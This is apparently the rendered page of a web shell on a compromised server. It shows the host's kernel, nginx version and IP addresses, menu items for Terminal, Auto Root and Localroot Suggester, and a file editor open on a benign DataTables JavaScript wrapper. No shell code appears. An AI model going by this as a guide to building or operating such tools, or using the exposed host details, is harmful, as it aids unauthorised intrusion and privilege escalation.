Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.73.229
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
public /
plugins /
datatables-select /
js /
Delete
Unzip
Name
Size
Permission
Date
Action
dataTables.select.js
33.4
KB
-rw-rw-r--
2022-12-15 15:03
dataTables.select.min.js
13.23
KB
-rw-rw-r--
2022-12-15 15:03
select.bootstrap4.js
833
B
-rw-rw-r--
2022-12-15 15:03
select.bootstrap4.min.js
538
B
-rw-rw-r--
2022-12-15 15:03
Save
Rename
/*! Bootstrap 4 styling wrapper for Select * ©2018 SpryMedia Ltd - datatables.net/license */ (function( factory ){ if ( typeof define === 'function' && define.amd ) { // AMD define( ['jquery', 'datatables.net-bs4', 'datatables.net-select'], function ( $ ) { return factory( $, window, document ); } ); } else if ( typeof exports === 'object' ) { // CommonJS module.exports = function (root, $) { if ( ! root ) { root = window; } if ( ! $ || ! $.fn.dataTable ) { $ = require('datatables.net-bs4')(root, $).$; } if ( ! $.fn.dataTable.select ) { require('datatables.net-select')(root, $); } return factory( $, root, root.document ); }; } else { // Browser factory( jQuery, window, document ); } }(function( $, window, document, undefined ) { return $.fn.dataTable; }));